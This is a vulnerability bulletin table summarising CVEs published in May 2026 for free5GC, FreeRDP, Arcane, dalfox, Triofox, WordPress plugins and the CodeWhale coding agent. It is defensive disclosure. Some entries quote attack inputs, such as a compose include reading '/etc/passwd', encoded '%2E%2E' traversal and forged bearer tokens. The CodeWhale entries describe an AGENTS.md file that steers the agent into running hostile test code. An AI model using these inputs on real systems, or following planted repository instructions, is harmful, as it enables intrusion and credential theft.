| Fourth Frontier--Frontier X Android application | The Frontier X2 device allows unauthenticated BLE read/write access to critical GATT characteristics without enforcing pairing authentication or authorization. This allows attackers within BLE range to perform unauthorized control of device functions, including starting/stopping activities, triggering vibrations, causing denial-of-service conditions, and fuzzing characteristic values to induce unexpected behavior. Additionally, the Frontier X mobile application lacks proper BLE device authentication, allowing attackers to impersonate a legitimate Frontier X2 device and connect to the application. By cloning BLE advertisements and exposing expected GATT characteristics, attackers can manipulate activity states and inject fabricated health telemetry such as breathing rate, heart rate, strain, and other health-related data into the mobile application. | 2026-05-29 | 8.8 | CVE-2026-5768 |
| fraillt--bitsery | A security vulnerability has been detected in fraillt bitsery up to 5.2.4. Affected is the function loadFromSharedState in the library include/bitsery/ext/std_smart_ptr.h. Such manipulation leads to improper validation of specified type of input. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 5.2.5 is able to address this issue. The name of the patch is 66d16516e24893bebc1c8af52bf2fe9ad0735061. Upgrading the affected component is advised. | 2026-05-26 | 7.3 | CVE-2026-9521 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-oam route group without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can hit the OAM route with no Authorization header at all and the handler returns 200 OK. The current OAM handler is a stub that returns null, but the structural defect is route-group-scoped: the entire OAM route group has no inbound auth middleware, so every future OAM operation added to this group inherits the missing auth boundary by default. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44327 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without OAuth2/bearer-token authorization middleware. A network attacker who can reach SMF on the SBI can hit UPI endpoints with no Authorization header at all, and the requests reach the SMF business handlers. In the running Docker lab this was directly demonstrated for read (GET /upi/v1/upNodesLinks), write (POST /upi/v1/upNodesLinks with attacker-controlled UP-node and link payload), and delete (DELETE /upi/v1/upNodesLinks/{nodeID}) operations. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44329 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-pfdmanagement route group without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can use a forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token) to read PFD application data via GET /applications and GET /applications/{appID}, and to create or delete PFD change-notification subscriptions via POST /subscriptions and DELETE /subscriptions/{subID}. Same root cause as the other NEF SBI findings: the route group is mounted without any inbound auth middleware. Unlike the OAM and traffic-influence groups, nnef-pfdmanagement IS declared in the runtime ServiceList, so this is the production-intended path that operators expect to be protected by OAuth2 setting receive from NRF: true -- and it is not. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 10 | CVE-2026-44330 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the 3gpp-pfd-management API without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can create, read, and delete PFD-management transaction state with a forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token). The route group is also reachable even when the running config's ServiceList does not declare it, so operators who think they disabled the service via config are still exposed. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 9.4 | CVE-2026-44315 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the 3gpp-traffic-influence API without inbound OAuth2/bearer-token authorization. A network attacker who can reach NEF on the SBI can create, read, patch, and delete traffic-influence subscriptions either with no Authorization header at all, or with a forged bearer token (e.g. Authorization: Bearer not-a-real-token). This includes creating AnyUeInd=true subscriptions intended to affect group / any-UE traffic steering. The route group is also reachable even when the running config's ServiceList does not declare it, so operators who think they disabled the service via config are still exposed. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 9.4 | CVE-2026-44326 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the PCF Npcf_SMPolicyControl service is missing authentication middleware, which allows unauthenticated access to SM policy handlers and disclosure of subscriber SUPI. In NewServer(), the smPolicyGroup route group is created and routes are applied without attaching the router authorization middleware. In contrast, other PCF service groups such as Npcf_PolicyAuthorization do attach RouterAuthorizationCheck before route registration. Because the middleware is missing, requests to the /npcf-smpolicycontrol/v1/sm-policies, /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}, /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}/update, and /npcf-smpolicycontrol/v1/sm-policies/{smPolicyId}/delete endpoints can reach business logic even when no valid OAuth token is provided. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 8.2 | CVE-2026-42083 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without inbound OAuth2 middleware. On top of that, the DELETE /upi/v1/upNodesLinks/{upNodeRef} handler unconditionally dereferences upNode.UPF after the type-guarded async release, even though AN-typed nodes are constructed without a UPF object. As a result, a single unauthenticated DELETE /upi/v1/upNodesLinks/gNB1 request crashes the handler with a nil-pointer panic AND mutates the in-memory user-plane topology before panicking (the UpNodeDelete(upNodeRef) line runs first). This is an unauthenticated, state-mutating panic-DoS sink that an off-path network attacker can trigger by name against any AN entry. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 8.2 | CVE-2026-44328 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's PCF POST /npcf-smpolicycontrol/v1/sm-policies handler (HandleCreateSmPolicyRequest) panics with a nil-pointer dereference when a downstream OpenAPI consumer call (UDR lookup) returns 404 Not Found and the consumer wrapper returns err != nil together with a nil response struct. The handler logs the OpenAPI error and continues executing instead of returning, then dereferences the nil response struct on a subsequent line and panics. Gin recovery converts the panic into HTTP 500, so a single attacker-shaped POST returns 500 instead of a clean 4xx whenever the downstream lookup fails. The PCF process keeps running. The trigger is a single POST containing input that causes the downstream UDR lookup to fail (e.g. an unknown DNN). In 4.2.1 this endpoint is also reachable WITHOUT an Authorization header because the PCF Npcf_SMPolicyControl route group is mounted without inbound auth middleware. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44316 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF terminates the entire process when a stored PFD-subscription notifyUri cannot be reached. In PfdChangeNotifier.FlushNotifications(), the notifier calls NnefPFDmanagementNotify(...) and on any delivery error invokes logger.PFDManageLog.Fatal(err), which is os.Exit(1)-equivalent in Go. An attacker who can create a PFD subscription with an attacker-chosen notifyUri and then trigger a PFD change can deterministically kill NEF on the asynchronous delivery attempt -- the process exits with status 1, dropping NEF's entire SBI surface until restart. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44319 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF mounts the nnef-callback route group without inbound OAuth2/bearer-token authorization. A forged or arbitrary bearer token (e.g. Authorization: Bearer not-a-real-token) is enough to reach the SMF-callback handler -- the callback body is parsed and dispatched into NEF business logic instead of being rejected at the auth boundary. Same root cause as the other NEF SBI findings: the route group is mounted without any inbound auth middleware. NEF does not authenticate the producer NF identity before processing callback content; if an attacker can guess or obtain a valid NotifId, this missing auth boundary lets forged callbacks act on real subscription state. The route group is also reachable even when the runtime ServiceList does not declare it (it lists only nnef-pfdmanagement and nnef-oam). This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.3 | CVE-2026-44320 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's SMF mounts the UPI management route group without inbound OAuth2 middleware. The POST /upi/v1/upNodesLinks create-or-update handler accepts attacker-controlled JSON and passes it directly into UpNodesFromConfiguration(), which calls logger.InitLog.Fatalf(...) on several validation failures. One confirmed path is the UE-IP-pool overlap check: a single unauthenticated POST that adds a new UPF whose pool overlaps an existing UPF terminates the entire SMF process (docker ps shows Exited (1)), not just the goroutine. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44321 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NEF PATCH /3gpp-pfd-management/v1/{afId}/transactions/{transId}/applications/{appId} handler panics with a nil-pointer dereference when the upstream UDR call fails AND the consumer wrapper returns err != nil together with a nil *ProblemDetails. The handler's errPfdData != nil branch builds its own problemDetailsErr correctly, but immediately after it reads problemDetails.Cause (the OTHER value, which is nil in this branch) and panics. Gin recovery converts the panic into HTTP 500, so a single PATCH against this endpoint returns 500 instead of the intended controlled error response whenever UDR access is failing. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44322 |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, free5GC's NRF root SBI endpoint POST /oauth2/token contains a parser-level type-confusion bug family. The handler in NFs/nrf/internal/sbi/api_accesstoken.go reflects over models.NrfAccessTokenAccessTokenReq, special-cases only plain string and NrfNfManagementNfType fields, and treats every other field as if it were a single models.PlmnId. The parsed *models.PlmnId is then assigned with reflect.Value.Set() to whichever field name the attacker put in the form body, which panics whenever the destination field's real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into HTTP 500, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable. This vulnerability is fixed in 4.2.2. | 2026-05-27 | 7.5 | CVE-2026-44325 |
| FreeRDP--FreeRDP | FreeRDP before 3.26.0 contains a heap-buffer-overflow vulnerability in gdi_CacheToSurface that allows remote attackers to write out-of-bounds heap memory. The vulnerability occurs because rectangle validation clamps coordinates to UINT16_MAX but performs copy operations using unclamped cache entry dimensions, enabling malicious RDP servers to trigger large out-of-bounds writes and potentially achieve remote code execution or client crash. | 2026-05-26 | 8.8 | CVE-2026-40033 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, a malicious RDP client can trigger a heap-buffer-overflow write in FreeRDP's server-side clipboard (cliprdr) channel by sending a CB_CLIP_CAPS PDU with a too-small capabilitySetLength. This can crash the server process (remote DoS) and may be exploitable for code execution because it corrupts heap memory. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 8.8 | CVE-2026-44420 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, a malicious RDP server can trigger a heap-buffer-overflow write in the FreeRDP client by sending crafted RDPGFX PDUs. The bug is in gdi_CacheToSurface: it validates a destination rectangle that is clamped to UINT16_MAX, but then performs the copy using the original cacheEntry->width/height. This can cause a large out-of-bounds heap write and may lead to client crashes or code execution. This bug is reachable from a malicious RDP server, but only when the client has RDPGFX enabled. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 8.8 | CVE-2026-44421 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, FreeRDP's RDPEAR NDR parser accepts one non-null NDR pointer ref-id for multiple logical pointer fields without tracking the pointed object's expected NDR type or ownership. When the same ref-id is reused across two pointer fields, the parser assigns the same heap object to both output fields. The generic destructor later walks each field independently and destroys/frees both pointers. This causes a malicious-server-triggerable heap use-after-free / double-free in the FreeRDP client's RDPEAR authentication-redirection path. This vulnerability is fixed in 3.26.0. | 2026-05-29 | 7.5 | CVE-2026-44422 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to 1.8.220, the email processing pipeline in FreeScout's FetchEmails command has two code paths for identifying agent (user) replies based on In-Reply-To / References headers. The notification reply path (notify-{thread_id}-{user_id}-...) extracts thread_id and user_id directly from the Message-ID without HMAC verification. An external attacker who can spoof the From address of a helpdesk agent can inject messages that FreeScout processes as legitimate agent replies - which are then automatically forwarded to customers via the legitimate SMTP server. This vulnerability is fixed in 1.8.220. | 2026-05-29 | 7.5 | CVE-2026-47123 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a SQL injection vulnerability in follow.php that allows attackers to manipulate database queries by injecting SQL code through the userid parameter. Attackers can submit union-based or time-based blind SQL injection payloads to extract sensitive database information including usernames, passwords, and database credentials. | 2026-05-25 | 8.2 | CVE-2018-25362 |
| Fyffe--PHP-Twitter-Clone | Twitter-Clone 1 contains a SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL queries by injecting malicious code through the name parameter. Attackers can submit crafted payloads to the search.php endpoint to extract database information including usernames, credentials, and system data using error-based and union-based SQL injection techniques. | 2026-05-25 | 8.2 | CVE-2018-25364 |
| Gallagher--Command Centre Server | Insertion of Sensitive Information into Log File (CWE-532) in some Command Centre Service installers could lead to Service Account credentials exposure. Mitigating Factor: Only sites that install Command Centre Services with a custom Service Account (not the default Network Service account) are potentially impacted. Mitigation: For sites concerned about exposure, the recommended action is to change the Service Account password. They can also delete any installer log files, usually found in %programdata%\Gallagher\Command Centre. | 2026-05-25 | 8.1 | CVE-2026-25193 |
| GDAL--GDAL | In GDAL 3.1.0 through 3.13.0, scanForGeometryContainers in the netCDF driver allows code execution via a stack-based buffer overflow. It reads a geometry attribute into a fixed-size stack buffer without validating the attribute length. The attacker embeds the exploit as an oversized geometry attribute in a crafted NetCDF file. This achieves arbitrary code execution on the server running GDAL. This is in frmts/netcdf/netcdfsg.cpp. | 2026-05-27 | 7.4 | CVE-2026-49014 |
| Genetec Inc.--Genetec RabbitMQ | A high-severity vulnerability in the deployment of Genetec RabbitMQ allows a privilege escalation attack. | 2026-05-26 | 7.8 | CVE-2026-25112 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0, Arcane's huma-based REST API exposes nine endpoints under /api/customize/git-repositories and /api/git-repositories/sync for managing GitOps source repositories and their stored credentials. Eight of those endpoints (list, create, get, update, delete, test, listBranches, browseFiles) never call the checkAdmin(ctx) helper that every other admin-managed resource (container registries, environments, users, API keys, swarm, settings, system, notifications, events) uses, and the huma authentication middleware deliberately enforces only authentication, not the admin role. As a result, any logged-in user with the default user role can list, create, modify, delete, and test git repository configurations. By repointing an existing repository's URL to an attacker-controlled host while omitting the token/sshKey fields (which UpdateRepository only rewrites when explicitly supplied), the attacker causes Arcane to decrypt the legitimate PAT/SSH key on its next /test, /branches, or /files call and present it as HTTP Basic auth (or SSH key auth) to the attacker's host - producing a one-step exfiltration of plaintext Git credentials. This vulnerability is fixed in 1.19.0. | 2026-05-29 | 9.9 | CVE-2026-45625 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.0, the unauthenticated GET /api/app-images/logo endpoint reflects a user-supplied color query parameter into the body of an SVG document via strings.ReplaceAll with no escaping. The substitution lands inside a <style> element of the embedded logo.svg, allowing an attacker to close the style block and inject executable <script> content. Because the response is served as image/svg+xml and Arcane sets no Content-Security-Policy or X-Content-Type-Options headers, navigating a logged-in admin victim to a crafted URL executes attacker-controlled JavaScript in Arcane's origin and rides the victim's HttpOnly JWT cookie to fully compromise the admin account. This vulnerability is fixed in 1.19.0. | 2026-05-29 | 8.2 | CVE-2026-45627 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.2, the PUT /api/environments/{id}/templates/variables endpoint, which writes the system-wide .env.global file used for variable substitution in every project's compose file, is missing an admin authorization check. Any authenticated non-admin user can call this endpoint with their bearer token or API key and overwrite the global environment variables that are merged into every project deployment. By overriding values like REGISTRY, IMAGE, DATABASE_URL, or SECRET_KEY that other users reference via ${VAR} in compose files, an attacker can redirect image pulls to attacker-controlled registries (supply-chain RCE on the Docker host), exfiltrate database credentials, or disrupt all projects. This vulnerability is fixed in 1.19.2. | 2026-05-29 | 8.8 | CVE-2026-47125 |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to 1.19.4, ProjectService.GetProjectFileContent returns the contents of any Docker Compose include directive declared in a project's compose file before any path-traversal validation runs. Because ProjectService.CreateProject writes attacker-supplied compose content to disk without validating include paths, an authenticated user can create a project whose compose file declares include: ['../../../../etc/passwd'], then read the include via the project file API. The result is arbitrary read of any file readable by the Arcane backend process, including /app/data/arcane.db (the SQLite database containing every user's password hash and API key), enabling escalation to admin and, via Arcane's Docker control plane, RCE on the host. This vulnerability is fixed in 1.19.4. | 2026-05-29 | 7.7 | CVE-2026-47179 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.8 before 18.10.7, 18.11 before 18.11.4, and 19.0 before 19.0.1 that, under certain conditions, could have allowed an authenticated user to cause specific Duo AI workflows to run under another user's identity due to improper user identity resolution when triggering Duo AI workflow runners. | 2026-05-27 | 8.2 | CVE-2026-4868 |
| gitoxide--gitoxide | gix-submodule before 0.29.0 (gitoxide before 0.5.21, gix before 0.84.0) incorrectly validates the update field in .gitmodules, allowing attackers to bypass the CommandForbiddenInModulesConfiguration guard when a submodule has been initialized with only partial configuration in .git/config. An attacker can inject arbitrary shell commands via the update field in .gitmodules that will be executed when Submodule::update() is called on a previously-initialized submodule, enabling remote code execution. | 2026-05-26 | 7.8 | CVE-2026-40034 |
| Gladinet--Triofox | A stack-based buffer overflow condition exists in WOSDefaultHttpModule.dll when processing a long URL path starting with /woshome. | 2026-05-27 | 9.8 | CVE-2026-8362 |
| Gladinet--Triofox | A stack-based buffer overflow condition exists in WOSDeviceDropFolder.dll when processing a long URL path starting with /resources. | 2026-05-27 | 9.8 | CVE-2026-8363 |
| Gladinet--Triofox | Gladinet Triofox Cloud Server Agent Access Service (GladServerAgentService.exe) listens on TCP port 7878 and processes remote HTTP messages with URL paths starting with /resources, /status, /sysinfo, /woshome, /Settings, /schedule, or /DavCache. | 2026-05-27 | 9.8 | CVE-2026-8364 |
| Gladinet--Triofox | When processing a request with a URL path starting with /status or /sysinfo, WOSHttpStatusModule.dll is to be loaded to handle such URL patterns. The WOSBin_LoadHttpModule function in the dll would be called to set up a "module" object for that module. However, WOSHttpStatusModule.dll is not present in the installation. As a result, a function pointer to WOSBin_LoadHttpModule (which would have been in the export table in WOSHttpStatusModule.dll) is set to NULL, resulting in calling a function at address 0. | 2026-05-27 | 7.5 | CVE-2026-8359 |
| Gladinet--Triofox | Function calls to WOSCommonUtil.dll!WOSSysInfoGetDeviceInterface() in various DLLs (i.e., WOSProfileMgrModule.dll, WOSWebDavModule.dll) can return a NULL pointer (i.e., when no user is logged into the Triofox Server Agent Management Console). The returned NULL pointer is not checked before being dereferenced. | 2026-05-27 | 7.5 | CVE-2026-8360 |
| Gladinet--Triofox | A path traversal vulnerability exists in WOSDefaultHttpModule.dll when processing a URL path starting with /woshome. | 2026-05-27 | 7.5 | CVE-2026-8361 |
| glboy--OTP Login With Phone Number, OTP Verification | The OTP Login With Phone Number, OTP Verification plugin for WordPress is vulnerable to authentication bypass in versions 1.8.50 through 1.8.60. This is due to the Firebase verification flow in the `lwp_ajax_register` AJAX handler not binding the Firebase session to the phone number supplied in the request. The `idehweb_lwp_activate_through_firebase()` function validates that a Firebase OTP session is legitimate, but the `phoneNumber` returned by Firebase is never compared against the victim's stored phone number. This makes it possible for unauthenticated attackers to authenticate as any user who has a phone number stored in user meta, including administrators, by verifying their own Firebase session and supplying the victim's phone number in the same request. | 2026-05-29 | 9.8 | CVE-2026-3655 |
| globalscape--CuteFTP | CuteFTP 5.0 XP contains a buffer overflow vulnerability that allows local attackers to execute arbitrary code by injecting malicious payload into the Site Manager label field. Attackers can craft a payload exceeding 520 bytes that overwrites the return address and executes shellcode when a shortcut is created and launched. | 2026-05-25 | 8.4 | CVE-2018-25366 |
| GNU--libredwg | A flaw has been found in GNU libredwg up to 0.13.4.8160. This issue affects the function bit_read_RC of the file bits.c of the component Dwgbmp Utility. This manipulation causes heap-based buffer overflow. The attack is possible to be carried out remotely. The exploit has been published and may be used. Patch name: 8f03865f37f5d4ffd616fef802acc980be54d300. Applying a patch is the recommended action to fix this issue. | 2026-05-26 | 7.3 | CVE-2026-9605 |
| go-git--go-billy | Billy is an interface filesystem abstraction for Go. Prior to 5.9.0, multiple path traversal issues exist across different components of go-billy. Insufficient path sanitization and boundary enforcement may allow crafted paths (e.g., using ..) to escape intended base directories. While go-billy was not originally designed to provide a strong security boundary, some of these issues were inconsistent across some of the built-in implementations. This results in scenarios where applications relying on go-billy for some level of isolation may inadvertently expose access to unintended filesystem locations. This vulnerability is fixed in 5.9.0. | 2026-05-28 | 8.1 | CVE-2026-44973 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is started in REST API server mode (dalfox server), the server binds to 0.0.0.0:6664 by default and requires no API key unless the operator explicitly passes --api-key. Because model.Options - including FoundAction and FoundActionShell - is deserialized directly from attacker-supplied JSON in POST /scan, and because dalfox.Initialize explicitly propagates those two fields into the final scan options without stripping them, any unauthenticated caller who can reach the server port can supply an arbitrary shell command that the dalfox process will execute on the host whenever a scan finding is triggered. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 10 | CVE-2026-45087 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is run in REST API server mode, the output, output-all, and debug fields in model.Options are JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine's logging path. The logger opens the attacker-supplied path with os.O_APPEND|os.O_CREATE|os.O_WRONLY and writes scan log lines to it. Critically, this file write block lives outside the IsLibrary guard in DalLog, so it executes even in server/library mode where file output was never intended to operate. Because no API key is required in the default configuration, an unauthenticated network caller can create or append to any file writable by the dalfox process on the host filesystem. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 8.2 | CVE-2026-45089 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, when dalfox is run in REST API server mode, the custom-payload-file field in model.Options is JSON-tagged and deserialized directly from the attacker's request body, then propagated unchanged through dalfox.Initialize into the scan engine. The engine passes the value to voltFile.ReadLinesOrLiteral, which reads lines from any file path accessible to the dalfox process and embeds each line as an XSS payload in outbound HTTP requests directed at the attacker-controlled target URL. Because the server has no API key by default, an unauthenticated network attacker can exfiltrate the contents of arbitrary files on the dalfox host by reading them line-by-line through scan traffic. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 7.5 | CVE-2026-45088 |
| hahwul--dalfox | Dalfox is a powerful open-source XSS scanner and utility focused on automation. Prior to 2.13.0, ParameterAnalysis in pkg/scanning/parameterAnalysis.go runs two sequential worker stages that both write to the same results channel. The channel is correctly closed after the first stage completes (close(results) at line 438), but the second stage - which processes POST-body parameters (dp) - is then launched with the same already-closed channel as its output. When a scanned parameter is reflected, processParams executes results <- paramResult on the closed channel, triggering a Go runtime panic that crashes the entire dalfox process. In server mode, the crash is remotely triggerable by any unauthenticated caller who can reach the REST API, because the default configuration has no API key and the second stage activates whenever options.Data != "" (i.e., the attacker supplies the data field) and the target reflects at least one parameter. This vulnerability is fixed in 2.13.0. | 2026-05-27 | 7.5 | CVE-2026-45090 |
| hanxi--xiaomusic | xiaomusic v0.5.7 contains an unauthenticated path traversal vulnerability in the GET /music/{file_path:path} endpoint that allows unauthenticated attackers to read arbitrary files outside the intended music directory by exploiting an incomplete path prefix check. Attackers can request files from sibling directories whose names share the music_path prefix by crafting traversal sequences, bypassing the path restriction due to the missing trailing separator in the comparison logic to retrieve arbitrary files from the server. | 2026-05-29 | 7.5 | CVE-2026-10108 |
| hassantafreshi--Easy Form Builder | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Blind SQL Injection. This issue affects Easy Form Builder: from n/a through <= 4.0.6. | 2026-05-27 | 9.3 | CVE-2026-42747 |
| haxtheweb--haxcms-nodejs | HAX CMS helps manage microsite universe with PHP or NodeJs backends. Versions up to and including 26.0.0 are affected by a stored cross-site scripting (XSS) vulnerability in the `/system/api/saveNode` endpoint. An authenticated user with a permission to edit pages can bypass the HTML sanitizer by injecting an event handler attribute without whitespace before the attribute name. @haxtheweb/haxcms-nodejs 26.0.1 and haxcms-php 26.0.2 patch the issue. | 2026-05-29 | 8.7 | CVE-2026-48527 |
| Heatmiser--Heatmiser Wifi Thermostat | Heatmiser Wifi Thermostat 1.7 contains a credential disclosure vulnerability that allows unauthenticated attackers to retrieve administrative credentials by accessing the networkSetup.htm page. Attackers can request the networkSetup.htm endpoint and extract plaintext username and password values from HTML form fields to gain administrative access to the thermostat. | 2026-05-29 | 7.5 | CVE-2018-25396 |
| hemant6488--CodeIgniter-StudentManagementSystem | A vulnerability was determined in hemant6488 CodeIgniter-StudentManagementSystem. The affected element is an unknown function of the file /index.php/students/addStudentView of the component Student Management Handler. Executing a manipulation can lead to improper access controls. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-26 | 7.3 | CVE-2026-9517 |
| himmelblau-idm--himmelblau | Himmelblau is an interoperability suite for Microsoft Azure Entra ID and Intune. From 2.0.0 to before 3.1.5 and 2.3.11, Himmelblau contained an authentication bypass vulnerability in the Device Authorization Grant (DAG) flow that allowed a user within the same Entra ID domain to obtain a local Unix session as another user by providing their own valid credentials. The vulnerability existed in the token_validate function, which validated domain aliases for legitimate multi-domain scenarios but failed to verify that the local part (username) of the authenticated user's UPN matched the requested account username. The function only compared domains, not the complete usernames. This vulnerability is fixed in 3.1.5 and 2.3.11. | 2026-05-27 | 8.4 | CVE-2026-45108 |
| Hitachi Vantara--Pentaho Data Integration and Analytics | Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.2.0.7 and 11.0.0.0, including 9.3.x and 8.3.x, do not prevent certain XML parsers from resolving external entities. | 2026-05-27 | 7.7 | CVE-2026-2253 |
| HKUDS--DeepCode | DeepCode through commit c991dc2 contains a path traversal vulnerability in the SPA catch-all route in new_ui/backend/main.py that allows unauthenticated attackers to read arbitrary files by supplying percent-encoded path segments to the GET /{full_path:path} endpoint. Attackers can bypass Starlette's path normalization by encoding slashes as %2F and dots as %2E%2E, causing the joined path to traverse outside FRONTEND_DIST and exposing sensitive files such as SSH private keys, TLS certificates, and application secrets with a single HTTP request. | 2026-05-28 | 7.5 | CVE-2026-32847 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. From 0.3.0 to 0.8.23, the run_tests tool executes cargo test in the workspace with ApprovalRequirement::Auto, meaning it runs without any user approval prompt. cargo test compiles and executes arbitrary code: test binaries, build.rs build scripts, and proc macros. While auto-approving test execution is a deliberate design choice, it creates an inconsistency in the security boundary. However, in a malicious repository, test code can execute arbitrary shell commands, exfiltrate credentials, or establish persistence with zero approval. The attack is amplified by AGENTS.md (auto-loaded into the system prompt), which can instruct the model to run tests proactively at session start. This vulnerability is fixed in 0.8.23. | 2026-05-28 | 9.6 | CVE-2026-45311 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.26, the task_create tool spawns durable sub-agents that inherit two insecure defaults: allow_shell defaults to true (config.rs:1499: self.allow_shell.unwrap_or(true)) and auto_approve defaults to true (task_manager.rs:297: auto_approve: Some(true)). When a user approves a task_create call (which requires ApprovalRequirement::Required), they approve what appears to be a benign work prompt. However, the spawned sub-agent silently receives unrestricted, unapproved shell access. This vulnerability is fixed in 0.8.26. | 2026-05-28 | 9.6 | CVE-2026-45374 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.22, the fetch_url tool validates the initial URL's resolved IP address against a restricted-IP blocklist (is_restricted_ip()) to prevent SSRF attacks against internal services (cloud metadata endpoints, localhost, private networks). However, the HTTP client (reqwest) is configured to automatically follow up to 5 redirects (reqwest::redirect::Policy::limited(5)) without re-validating the redirect target against the same SSRF protections. This vulnerability is fixed in 0.8.22. | 2026-05-28 | 7.4 | CVE-2026-45310 |
| Hmbown--CodeWhale | CodeWhale is a DeepSeek + MiMo coding agent in terminal. Prior to 0.8.26, although SSRF protection is validated against hostnames that resolve to private IPv6 addresses, when the IPv6 address is provided literally in the URL as http://[::1], the SSRF defenses do not work. This vulnerability is fixed in 0.8.26. | 2026-05-28 | 7.4 | CVE-2026-45373 |
| home-assistant--core | Home Assistant is open source home automation software that puts local control and privacy first. Prior to 2026.4.1 for iOS and 2026.4.4 for Android, the Home Assistant Companion apps for Android and iOS expose a JavaScript bridge to the in-app WebView: window.externalApp on Android and webkit.messageHandlers.getExternalAuth (alongside revokeExternalAuth and externalBus) on iOS. Two flaws, exposure of the bridge to all frames (including cross-origin iframes) and unsanitized interpolation of the JavaScript callback identifier, allow a cross-origin iframe rendered inside the Companion app to execute arbitrary JavaScript in the Home Assistant frontend's main-frame origin and exfiltrate the signed-in user's access token. This vulnerability is fixed in 2026.4.1 for iOS and 2026.4.4 for Android. | 2026-05-29 | 8.3 | CVE-2026-44698 |
| HT Plugins--HT Contact Form 7 | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in HT Plugins HT Contact Form 7 ht-contactform allows Stored XSS. This issue affects HT Contact Form 7: from n/a through <= 2.8.2. | 2026-05-27 | 7.1 | CVE-2026-42728 |
